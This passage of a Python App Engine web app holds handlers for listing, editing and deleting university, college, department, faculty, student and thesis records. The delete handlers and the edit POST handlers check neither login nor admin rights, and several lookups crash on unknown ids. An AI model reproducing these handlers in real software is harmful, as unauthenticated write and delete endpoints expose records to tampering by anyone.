        self.response.write(template.render({
            'links': nav,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))
class CollegeAPIHandler(webapp2.RequestHandler):
    """JSON API: lists all colleges with their university name, by creation date."""

    def get(self):
        """Write ``{'result': 'OK', 'data': [...]}`` for a registered user.

        Writes no response body when the visitor is anonymous or has no
        User entity (preserved from the original implementation).
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                collegelist = College.query().order(College.created_date).fetch()
                college = []
                for c in collegelist:
                    # Fetch the referenced university directly by key —
                    # one datastore get instead of a query-by-key.
                    un = c.college_university.get()
                    college.append({
                        'id': c.key.id(),
                        'college_name': c.college_name,
                        'college_university': un.university_name,
                    })
                response = {
                    'result': 'OK',
                    'data': college,
                }
                # Fix: was 'application.json' (typo) — clients would not
                # recognize the response as JSON.
                self.response.headers['Content-Type'] = 'application/json'
                self.response.out.write(json.dumps(response))
class CollegeListHandler(webapp2.RequestHandler):
    """Renders the college list page, or the login page for anonymous visitors."""

    def get(self):
        current = users.get_current_user()
        if not current:
            # Not signed in at all: offer login and registration.
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', current.user_id()).get()
        if not user:
            # Signed in with Google but no app profile yet.
            self.redirect('/register')
            return
        link_text = 'Logout'
        if user.is_admin:
            nav = {
                'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
            }
        else:
            nav = {
                'Faculty': {'List': '/faculty/list'},
                'Students': {'List': '/student/list'},
                'Universities': {'List': '/university/list'},
                'Colleges': {'List': '/college/list'},
                'Departments': {'List': '/department/list'},
                'Theses': {'List': '/thesis/list/all'},
            }
        template = JINJA_ENVIRONMENT.get_template('/pages/collegelist.html')
        self.response.write(template.render({
            'links': nav,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))
class DepartmentAPIHandler(webapp2.RequestHandler):
    """JSON API: lists all departments with college and chairperson names."""

    def get(self):
        """Write ``{'result': 'OK', 'data': [...]}`` for a registered user.

        Writes no response body when the visitor is anonymous or has no
        User entity (preserved from the original implementation).
        """
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                departmentlist = Department.query().order(Department.created_date).fetch()
                dept = []
                for d in departmentlist:
                    # Resolve referenced entities directly by key —
                    # one datastore get each instead of a query-by-key.
                    c = d.department_college.get()
                    f = d.department_chair.get()
                    dept.append({
                        'id': d.key.id(),
                        'department_name': d.department_name,
                        'department_college': c.college_name,
                        'department_chair': f.faculty_full,
                    })
                response = {
                    'result': 'OK',
                    'data': dept,
                }
                # Fix: was 'application.json' (typo) — clients would not
                # recognize the response as JSON.
                self.response.headers['Content-Type'] = 'application/json'
                self.response.out.write(json.dumps(response))
class DepartmentListHandler(webapp2.RequestHandler):
    """Renders the department list page, or the login page for anonymous visitors."""

    def get(self):
        current = users.get_current_user()
        if not current:
            # Not signed in at all: offer login and registration.
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', current.user_id()).get()
        if not user:
            # Signed in with Google but no app profile yet.
            self.redirect('/register')
            return
        link_text = 'Logout'
        if user.is_admin:
            nav = {
                'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
            }
        else:
            nav = {
                'Faculty': {'List': '/faculty/list'},
                'Students': {'List': '/student/list'},
                'Universities': {'List': '/university/list'},
                'Colleges': {'List': '/college/list'},
                'Departments': {'List': '/department/list'},
                'Theses': {'List': '/thesis/list/all'},
            }
        template = JINJA_ENVIRONMENT.get_template('/pages/departmentlist.html')
        self.response.write(template.render({
            'links': nav,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))
class FacultyDeleteHandler(webapp2.RequestHandler):
    """Deletes a Faculty entity by its datastore id and acknowledges with JSON."""

    def post(self, id):
        entity = Faculty.get_by_id(id)
        # Delete via the fetched entity's key; an unknown id raises
        # AttributeError (HTTP 500), same as the original behavior.
        entity.key.delete()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({'result': 'OK'}))
class FacultyEditHandler(webapp2.RequestHandler):
    """Admin-only faculty edit page (GET) and its JSON save endpoint (POST)."""

    def get(self, id):
        """Render the edit form for faculty `id`; non-admins are sent home."""
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                if user.is_admin:
                    logout_url = users.create_logout_url('/')
                    link_text = 'Logout'
                    # Admin navigation: every section exposes List + Create links.
                    links = {}
                    links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
                    links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
                    links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
                    links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
                    links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
                    links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
                    # NOTE(review): get_by_id returns None for an unknown id,
                    # which would make the attribute access below raise — confirm
                    # the route only ever receives valid ids.
                    faculty = Faculty.get_by_id(id)
                    department = None
                    if faculty.faculty_department is not None:
                        # Resolve the department key to its display name.
                        department = Department.query(Department.key == faculty.faculty_department)
                        department = department.get()
                        department = department.department_name
                    data = {
                        'links':links,
                        'item' : faculty,
                        'dept' : department,
                        'logout_url':logout_url,
                        'user':user.first_name
                    }
                    template = JINJA_ENVIRONMENT.get_template('/pages/facultyedit.html')
                    self.response.write(template.render(data))
                else:
                    # Registered but not an admin: back to the home page.
                    self.redirect('/')
            else:
                # Google account exists but no app profile yet.
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url':login_url,
                'reg_url':'/register'
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))

    def post(self, id):
        """Overwrite faculty `id` from the form fields and echo the saved data.

        NOTE(review): the entity is rebuilt from scratch and saved under the
        existing key, so any Faculty property not assigned here is reset —
        confirm the form always posts every field.
        """
        faculty = Faculty()
        # Resolve the posted department name to its entity key.
        faculty_department_temp = Department.query(Department.department_name == self.request.get('faculty_department'))
        faculty_department_temp = faculty_department_temp.get()
        faculty_department_key = faculty_department_temp.key
        faculty.faculty_title = self.request.get('faculty_title')
        faculty.faculty_fname = self.request.get('faculty_fname')
        faculty.faculty_sname = self.request.get('faculty_sname')
        # Denormalized full name used for display and lookups elsewhere.
        faculty_full = faculty.faculty_fname + ' ' + faculty.faculty_sname
        faculty.faculty_full = faculty_full
        faculty.faculty_email = self.request.get('faculty_email')
        faculty.faculty_phone = self.request.get('faculty_phone')
        faculty.faculty_department = ndb.Key('Department', faculty_department_key.id())
        # Birthday is stored as the raw posted string.
        faculty.faculty_bday = self.request.get('faculty_bday')
        # Reuse the URL id so put() updates the existing entity in place.
        faculty.key = ndb.Key(Faculty, id)
        faculty.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result':'OK',
            'data':{
                'title':faculty.faculty_title,
                'first_name':faculty.faculty_fname,
                'last_name':faculty.faculty_sname,
                'full_name':faculty.faculty_full,
                'email':faculty.faculty_email,
                'phone':faculty.faculty_phone,
                'bday':faculty.faculty_bday
            }
        }
        self.response.out.write(json.dumps(response))
class StudentDeleteHandler(webapp2.RequestHandler):
    """Deletes a Student entity by its datastore id and acknowledges with JSON."""

    def post(self, id):
        entity = Student.get_by_id(id)
        # Delete via the fetched entity's key; an unknown id raises
        # AttributeError (HTTP 500), same as the original behavior.
        entity.key.delete()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({'result': 'OK'}))
class StudentEdithandler(webapp2.RequestHandler):
    """Admin-only student edit page (GET) and its JSON save endpoint (POST)."""

    def get(self, id):
        """Render the edit form for student `id`; non-admins are sent home."""
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                if user.is_admin:
                    logout_url = users.create_logout_url('/')
                    link_text = 'Logout'
                    # Admin navigation: every section exposes List + Create links.
                    links = {}
                    links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
                    links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
                    links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
                    links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
                    links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
                    links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
                    # NOTE(review): get_by_id returns None for an unknown id,
                    # which would make the attribute access below raise — confirm
                    # the route only ever receives valid ids.
                    student = Student.get_by_id(id)
                    department = None
                    if student.student_department is not None:
                        # Resolve the department key to its display name.
                        department = Department.query(Department.key == student.student_department)
                        department = department.get()
                        department = department.department_name
                    data = {
                        'links' : links,
                        'item' : student,
                        'id':id,
                        'dept' : department,
                        'logout_url':logout_url,
                        'user':user.first_name
                    }
                    template = JINJA_ENVIRONMENT.get_template('/pages/studentedit.html')
                    self.response.write(template.render(data))
                else:
                    # Registered but not an admin: back to the home page.
                    self.redirect('/')
            else:
                # Google account exists but no app profile yet.
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url':login_url,
                'reg_url':'/register'
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))

    def post(self, id):
        """Overwrite student `id` from the form fields and echo the saved data.

        NOTE(review): the entity is rebuilt from scratch and saved under the
        existing key, so any Student property not assigned here is reset —
        confirm the form always posts every field.
        """
        student = Student()
        # Resolve the posted department name to its entity key.
        student_department_temp = Department.query(Department.department_name == self.request.get('student_department'))
        student_department_temp = student_department_temp.get()
        student_department_key = student_department_temp.key
        student.student_fname = self.request.get('student_fname')
        student.student_sname = self.request.get('student_sname')
        # Denormalized full name used for display and lookups elsewhere.
        student.student_full = student.student_fname + ' ' + student.student_sname
        student.student_phone = self.request.get('student_phone')
        student.student_email = self.request.get('student_email')
        student.student_number = self.request.get('student_number')
        # NOTE(review): raises ValueError if the posted year is not numeric —
        # confirm the form validates this client-side.
        student.student_graduated = int(self.request.get('student_graduated'))
        student.student_department = ndb.Key('Department', student_department_key.id())
        # Birthday is stored as the raw posted string.
        student.student_bday = self.request.get('student_bday')
        # Reuse the URL id so put() updates the existing entity in place.
        student.key = ndb.Key(Student, id)
        student.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result':'OK',
            'data':{
                'first_name':student.student_fname,
                'last_name':student.student_sname,
                'full_name':student.student_full,
                'phone':student.student_phone,
                'email':student.student_email,
                'student_number':student.student_number,
                'year_graduated':student.student_graduated
            }
        }
        self.response.out.write(json.dumps(response))
class UniversityDeleteHandler(webapp2.RequestHandler):
    """Deletes a University entity by its datastore id and acknowledges with JSON."""

    def post(self, id):
        entity = University.get_by_id(id)
        # Delete via the fetched entity's key; an unknown id raises
        # AttributeError (HTTP 500), same as the original behavior.
        entity.key.delete()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({'result': 'OK'}))
class UniversityEditHandler(webapp2.RequestHandler):
    """Admin-only university edit page (GET) and its JSON save endpoint (POST)."""

    def get(self, id):
        """Render the edit form for university `id`; non-admins are sent home."""
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                if user.is_admin:
                    logout_url = users.create_logout_url('/')
                    link_text = 'Logout'
                    # Admin navigation: every section exposes List + Create links.
                    links = {}
                    links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
                    links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
                    links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
                    links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
                    links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
                    links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
                    university = University.get_by_id(id)
                    data = {
                        'links' : links,
                        'item' : university,
                        'logout_url':logout_url,
                        # NOTE(review): sibling edit handlers pass
                        # user.first_name here; this one passes the whole
                        # entity — verify universityedit.html expects that.
                        'user':user
                    }
                    template = JINJA_ENVIRONMENT.get_template('/pages/universityedit.html')
                    self.response.write(template.render(data))
                else:
                    # Registered but not an admin: back to the home page.
                    self.redirect('/')
            else:
                # Google account exists but no app profile yet.
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url':login_url,
                'reg_url':'/register'
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))

    def post(self, id):
        """Overwrite university `id` from the form fields and echo the saved data.

        NOTE(review): the entity is rebuilt from scratch and saved under the
        existing key, so any property not assigned here is reset.
        """
        university = University()
        university.university_name = self.request.get('university_name')
        university.university_initial = self.request.get('university_initial')
        university.university_address = self.request.get('university_address')
        # Reuse the URL id so put() updates the existing entity in place.
        university.key = ndb.Key(University, id)
        university.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result':'OK',
            'data':{
                'university_name': university.university_name,
                'university_initial': university.university_initial,
                'university_address': university.university_address
            }
        }
        self.response.out.write(json.dumps(response))
class CollegeDeleteHandler(webapp2.RequestHandler):
    """Deletes a College entity by its datastore id and acknowledges with JSON."""

    def post(self, id):
        entity = College.get_by_id(id)
        # Delete via the fetched entity's key; an unknown id raises
        # AttributeError (HTTP 500), same as the original behavior.
        entity.key.delete()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({'result': 'OK'}))
class CollegeEditHandler(webapp2.RequestHandler):
    """Admin-only college edit page (GET) and its JSON save endpoint (POST)."""

    def get(self, id):
        """Render the edit form for college `id`; non-admins are sent home."""
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                if user.is_admin:
                    logout_url = users.create_logout_url('/')
                    link_text = 'Logout'
                    college = College.get_by_id(id)
                    # Resolve each referenced department key to its name.
                    depts = []
                    for c in college.college_departments:
                        department = Department.query(Department.key == c)
                        logging.info(department)
                        # NOTE(review): a Query object is never None, so this
                        # check is always true; department.get() below may
                        # still return None for a dangling key — confirm.
                        if department is not None:
                            department = department.get()
                            depts.append(department.department_name)
                        university = University.query(University.key == college.college_university)
                        university = university.get()
                    # Admin navigation: every section exposes List + Create links.
                    links = {}
                    links['Faculty'] = {'List':'/faculty/list','Create Entry':'/faculty/create'}
                    links['Students'] = {'List':'/student/list','Create Entry':'/student/create'}
                    links['Department'] = {'List':'/department/list','Create Entry':'/department/create'}
                    links['Universities'] = {'List':'/university/list','Create Entry':'/university/create'}
                    links['Colleges'] = {'List':'/college/list','Create Entry':'/college/create'}
                    links['Theses'] = {'List':'/thesis/list/all','Create Entry':'/thesis/create'}
                    # NOTE(review): template_values is built but never rendered
                    # in this method (data below is used instead) — dead code?
                    template_values = {
                        'links':links,
                        'search_url':'/search',
                        'logout_url': users.create_logout_url('/'),
                        'user': user.first_name
                    }
                    data = {
                        'links':links,
                        'item' : college,
                        'univ' : university.university_name,
                        'dept' : depts,
                        'logout_url':logout_url,
                        'user':user.first_name
                    }
                    # Expose each department name individually for the form's
                    # numbered college_dept_N fields.
                    for i in range(0, len(depts)):
                        data['college_dept_' + str(i)] = depts[i]
                    logging.info(data)
                    template = JINJA_ENVIRONMENT.get_template('/pages/collegeedit.html')
                    self.response.write(template.render(data))
                else:
                    # Registered but not an admin: back to the home page.
                    self.redirect('/')
            else:
                # Google account exists but no app profile yet.
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url':login_url,
                'reg_url':'/register'
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))

    def post(self, id):
        """Overwrite college `id` from the form and rebuild its department list.

        Reads numbered fields college_department_0, _1, ... until the first
        empty/absent one; each name is resolved to a Department key and
        appended if not already present.
        """
        college = College()
        # Resolve the posted university name to its entity key.
        college_university_temp = University.query(University.university_name == self.request.get('college_university'))
        college_university_temp = college_university_temp.get()
        college_university_key = college_university_temp.key
        department = college.college_departments
        dept_temp = []
        i = 0
        if self.request.get('college_department_' + str(i)) is not None and self.request.get('college_department_' + str(i)) != '':
            while self.request.get('college_department_' + str(i)) is not None and self.request.get('college_department_' + str(i)) != '':
                college_dept_temp = Department.query(Department.department_name == self.request.get('college_department_' + str(i)))
                college_dept_temp = college_dept_temp.get()
                # Skip duplicates so repeated names yield one key each.
                if college_dept_temp.key not in department:
                    department.append(college_dept_temp.key)
                i += 1
            college.college_departments = department
        else:
            # No department fields posted: clear the list.
            college.college_departments = []
        college.college_university = ndb.Key('University', college_university_key.id())
        college.college_name = self.request.get('college_name')
        # Reuse the URL id so put() updates the existing entity in place.
        college.key = ndb.Key(College, id)
        college.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result':'OK',
            'data':{
                'college_name': college.college_name
            }
        }
        self.response.out.write(json.dumps(response))
class DepartmentDeleteHandler(webapp2.RequestHandler):
    """Deletes a Department and removes its key from the owning College's list."""

    def post(self, id):
        department = Department.get_by_id(id)
        # Wrap the key in a list for the IN() filter below.
        dept = []
        dept.append(department.key)
        logging.info(dept)
        # Find the (first) college whose department list references this key.
        # NOTE(review): college.get() returns None when no college references
        # the department, and the attribute access below would then raise —
        # confirm every department is always attached to a college.
        college = College.query(College.college_departments.IN(dept))
        college = college.get()
        logging.info(college)
        # Remove this department's key from the college's list and save.
        depts = []
        depts = college.college_departments
        depts.remove(department.key)
        college.college_departments = depts
        # Self-assignment kept as-is; it has no effect on the entity.
        college.key = college.key
        college.put()
        department.key.delete()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result':'OK'
        }
        self.response.out.write(json.dumps(response))
class DepartmentEditHandler(webapp2.RequestHandler):
    """Admin-only department edit page (GET) and its JSON save endpoint (POST)."""

    def get(self, id):
        """Render the edit form for department `id`; non-admins are sent home."""
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                if user.is_admin:
                    logout_url = users.create_logout_url('/')
                    link_text = 'Logout'
                    department = Department.get_by_id(id)
                    # Fix: initialize both display names so the template data
                    # below is always defined; previously a department with no
                    # college or chair raised NameError here.
                    college = None
                    chairperson = None
                    if department.department_college is not None:
                        # Fetch directly by key — one datastore get instead of
                        # a query-by-key.
                        college = department.department_college.get()
                        college = college.college_name
                    if department.department_chair is not None:
                        chairperson = department.department_chair.get()
                        chairperson = chairperson.faculty_full
                    # Admin navigation: every section exposes List + Create links.
                    links = {
                        'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                        'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                        'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                        'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                        'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                        'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
                    }
                    data = {
                        'links': links,
                        'item': department,
                        'college': college,
                        'chairperson': chairperson,
                        'logout_url': logout_url,
                        'user': user.first_name,
                    }
                    logging.info(data)
                    template = JINJA_ENVIRONMENT.get_template('/pages/departmentedit.html')
                    self.response.write(template.render(data))
                else:
                    # Registered but not an admin: back to the home page.
                    self.redirect('/')
            else:
                # Google account exists but no app profile yet.
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url': login_url,
                'reg_url': '/register',
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))

    def post(self, id):
        """Overwrite department `id` from the form and link it to its college.

        NOTE(review): if the department is moved to a different college, the
        previous college keeps a stale reference in its department list —
        confirm whether that cleanup is handled elsewhere.
        """
        department = Department()
        # Resolve the posted college and chair names to entity keys.
        department_college_temp = College.query(College.college_name == self.request.get('department_college'))
        department_college_temp = department_college_temp.get()
        department_college_key = department_college_temp.key
        department_chair_temp = Faculty.query(Faculty.faculty_full == self.request.get('department_chair'))
        department_chair_temp = department_chair_temp.get()
        department_chair_key = department_chair_temp.key
        department.department_college = ndb.Key('College', department_college_key.id())
        department.department_name = self.request.get('department_name')
        department.department_chair = ndb.Key('Faculty', department_chair_key.id())
        # Reuse the URL id so put() updates the existing entity in place.
        department.key = ndb.Key(Department, id)
        department.put()
        c = department.department_college.get()
        logging.info(c)
        logging.info(c.college_departments)
        # Fix: previously the key was appended unconditionally, so every save
        # of an existing department duplicated its key in the college's list.
        if department.key not in c.college_departments:
            c.college_departments.append(department.key)
            c.put()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result': 'OK',
            'data': {
                'department_name': department.department_name,
            },
        }
        self.response.out.write(json.dumps(response))
class ThesisDeleteHandler(webapp2.RequestHandler):
    """Deletes a thesis entry by its numeric datastore id and acknowledges with JSON."""

    def post(self, id):
        # Thesis ids are numeric, unlike the other delete handlers' string ids.
        entity = thesisentry.get_by_id(int(id))
        entity.key.delete()
        self.response.headers['Content-Type'] = 'application/json'
        self.response.out.write(json.dumps({'result': 'OK'}))
class ThesisEditHandler(webapp2.RequestHandler):
    """Admin-only thesis edit page (GET) and its JSON save endpoint (POST)."""

    def get(self, id):
        """Render the edit form for thesis `id`; non-admins are sent home."""
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                if user.is_admin:
                    logout_url = users.create_logout_url('/')
                    link_text = 'Logout'
                    # Admin navigation: every section exposes List + Create links.
                    links = {
                        'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                        'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                        'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                        'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                        'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                        'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
                    }
                    thesis = thesisentry.get_by_id(int(id))
                    # Resolve referenced keys to display names for the form.
                    adviser = Faculty.get_by_id(thesis.thesis_adviser.id())
                    adviser = adviser.faculty_full
                    proponents = []
                    for t in thesis.thesis_proponent:
                        p = Student.get_by_id(t.id())
                        proponents.append(p.student_full)
                    department = Department.get_by_id(thesis.thesis_department.id())
                    department = department.department_name
                    template_values = {
                        'links': links,
                        'id': id,
                        'proponents': proponents,
                        'adviser': adviser,
                        'department': department,
                        'thesis': thesis,
                        'logout_url': logout_url,
                        'user': user.first_name,
                    }
                    template = JINJA_ENVIRONMENT.get_template('/pages/thesisedit.html')
                    self.response.write(template.render(template_values))
                else:
                    # Registered but not an admin: back to the home page.
                    self.redirect('/')
            else:
                # Google account exists but no app profile yet.
                self.redirect('/register')
        else:
            login_url = users.create_login_url('/login')
            template_values = {
                'login_url': login_url,
                'reg_url': '/register',
            }
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render(template_values))

    def post(self, id):
        """Overwrite thesis `id` from the form fields and echo the saved data.

        Proponents arrive as numbered fields thesis_proponent_0, _1, ...;
        each name is looked up first as a Student, then as a Faculty member.
        """
        thesis = thesisentry()
        loggedin_user = users.get_current_user()
        user_key = ndb.Key('User', loggedin_user.user_id())
        thesis_proponents = []
        i = 0
        # Collect proponent keys until the first empty/absent field.
        while self.request.get('thesis_proponent_' + str(i)) is not None and self.request.get('thesis_proponent_' + str(i)) != '':
            thesis_proponent_temp = Student.query(Student.student_full == self.request.get('thesis_proponent_' + str(i)))
            if thesis_proponent_temp.count():
                thesis_proponent_temp = thesis_proponent_temp.get()
                thesis_proponents.append(thesis_proponent_temp.key)
            else:
                # Not a student: fall back to a faculty lookup by full name.
                thesis_proponent_temp = Faculty.query(Faculty.faculty_full == self.request.get('thesis_proponent_' + str(i)))
                if thesis_proponent_temp.count():
                    thesis_proponent_temp = thesis_proponent_temp.get()
                    thesis_proponents.append(thesis_proponent_temp.key)
                else:
                    # Unknown name: keep list positions aligned with the form.
                    thesis_proponents.append(None)
            i += 1
        logging.info(thesis_proponents)
        # Resolve adviser and department names to entity keys.
        thesis_adviser_temp = Faculty.query(Faculty.faculty_full == self.request.get('thesis_adviser'))
        thesis_adviser_temp = thesis_adviser_temp.get()
        thesis_adviser_key = thesis_adviser_temp.key
        thesis_department_temp = Department.query(Department.department_name == self.request.get('thesis_department'))
        thesis_department_temp = thesis_department_temp.get()
        thesis_department_key = thesis_department_temp.key
        thesis.thesis_author = user_key
        thesis.thesis_year = self.request.get('thesis_year')
        thesis.thesis_title = self.request.get('thesis_title')
        thesis.thesis_abstract = self.request.get('thesis_abstract')
        thesis.thesis_adviser = ndb.Key('Faculty', thesis_adviser_key.id())
        thesis.thesis_section = self.request.get('thesis_section')
        thesis.thesis_proponent = thesis_proponents
        thesis.thesis_department = ndb.Key('Department', thesis_department_key.id())
        # Reuse the URL id so put() updates the existing entity in place.
        thesis.key = ndb.Key(thesisentry, int(id))
        # Derive search tags from title words of 3+ characters, de-duplicated.
        tags = []
        for t in thesis.thesis_title.split():
            if len(t) >= 3 and t not in tags:
                tags.append(t)
        thesis.thesis_tags = tags
        thesis.put()
        author = user_key.get()
        self.response.headers['Content-Type'] = 'application/json'
        response = {
            'result': 'OK',
            'data': {
                'id': thesis.key.urlsafe(),
                'year': thesis.thesis_year,
                'title': thesis.thesis_title,
                'abstract': thesis.thesis_abstract,
                'section': thesis.thesis_section,
                # Fix: previously concatenated the User *entity* with a string
                # (user_key.get() + ' ' + ...), raising TypeError on every
                # successful save. Use the author's name fields instead.
                'author': author.first_name + ' ' + author.last_name,
            },
        }
        self.response.out.write(json.dumps(response))
class ThesisListAll(webapp2.RequestHandler):
    """Renders the full thesis list page, or the login page for anonymous visitors."""

    def get(self):
        current = users.get_current_user()
        if not current:
            # Not signed in at all: offer login and registration.
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', current.user_id()).get()
        if not user:
            # Signed in with Google but no app profile yet.
            self.redirect('/register')
            return
        link_text = 'Logout'
        if user.is_admin:
            nav = {
                'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
            }
        else:
            nav = {
                'Faculty': {'List': '/faculty/list'},
                'Students': {'List': '/student/list'},
                'Department': {'List': '/department/list'},
                'Universities': {'List': '/university/list'},
                'Colleges': {'List': '/college/list'},
                'Theses': {'List': '/thesis/list/all'},
            }
        template = JINJA_ENVIRONMENT.get_template('/pages/thesislist.html')
        self.response.write(template.render({
            'links': nav,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }))
class ThesisListFilter(webapp2.RequestHandler):
    """Renders a filtered thesis list; `value` is tried as a year, then a
    faculty id (adviser filter), then a university id (department filter)."""

    def get(self, value):
        loggedin_user = users.get_current_user()
        if loggedin_user:
            user_key = ndb.Key('User', loggedin_user.user_id())
            user = user_key.get()
            if user:
                logging.info(value)
                # First interpretation: value is a thesis year.
                thesisdet = thesisentry.query(thesisentry.thesis_year == value).fetch()
                selected = value
                if len(thesisdet) == 0:
                    # Second interpretation: value is a Faculty id — list the
                    # theses that faculty member advised.
                    faculty = Faculty.get_by_id(value)
                    logging.info(faculty)
                    if faculty is not None and len(thesisentry.query(thesisentry.thesis_adviser == faculty.key).fetch()) != 0:
                        thesisdet = thesisentry.query(thesisentry.thesis_adviser == faculty.key).fetch()
                        selected = faculty.faculty_full
                    else:
                        # Last interpretation: value is a University id — walk
                        # university -> (first) college -> (first) department
                        # and list that department's theses.
                        # NOTE(review): only the first matching college and
                        # department are considered, and an unknown id makes
                        # university None and the access below raise — confirm
                        # callers only pass valid ids.
                        university = University.get_by_id(value)
                        college = College.query(College.college_university == university.key)
                        college = college.get()
                        department = Department.query(Department.department_college == college.key)
                        department = department.get()
                        thesisdet = thesisentry.query(thesisentry.thesis_department == department.key).fetch()
                        selected = university.university_name
                logout_url = users.create_logout_url('/')
                link_text = 'Logout'
                template_values = {
                    'thesis': thesisdet,
                    'selected': selected,
                    'logout_url':logout_url,
                    'user':user.first_name
                }
                template = JINJA_ENVIRONMENT.get_template('/pages/thesislistfiltered.html')
                self.response.write(template.render(template_values))
            else:
